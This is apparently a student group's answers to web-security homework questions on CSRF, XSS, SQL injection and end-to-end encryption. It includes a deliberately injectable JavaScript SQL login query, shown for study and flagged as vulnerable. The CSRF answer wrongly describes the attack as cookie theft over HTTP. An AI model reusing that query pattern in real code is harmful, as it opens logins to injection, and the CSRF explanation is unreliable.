- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
- What is SQL injection? and what is the attacker’s intention from it?
- Consider the below SQL command, where is the vulnerability? think about some ways an attacker can misuse it:
const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;
- What does End-to-End encryption means? Share an example of an well-known app using E2EE, how is that app using it?
1- it's the Cross-site request forgery, it use cookies, which have user credentials to be send on every request to validate user authentication and http is stateless and not encrypted the same as https and hacker can get these cookies and send request using it, CSRF is sometimes called a "one-click attack" because it typically only requires the victim to click on a link or visit a webpage containing the malicious code once.
2- Cross-site scripting, XSS attacks allow attackers to inject malicious scripts into trusted websites. By doing so, they can steal cookies or session tokens from other users who visit the compromised site, potentially compromising their accounts. The two main categories are Reflected XSS ,Stored XSS
3-SQL Injections is when the user inject a malicious SQL command into the query by form for example, for example to have access during sign in or delete data from database and that is why data sanitization is important.
4- The vulnerability is that we are putting data collected from the client directly to SQL query without validating or sanitize it
and preferably we should use a package for that.
5- End-to-end encryption (E2EE) is a method of secure communication that prevents third-parties from accessing data while it's transferred from one end system or device to another, WhatsApp is using this type of encryption.
Abdulrahman Khalil, Elaf Gardi, Dawood Alkawaz, Meer Atta, Vinos sarhad, AbdAlRahman Muayid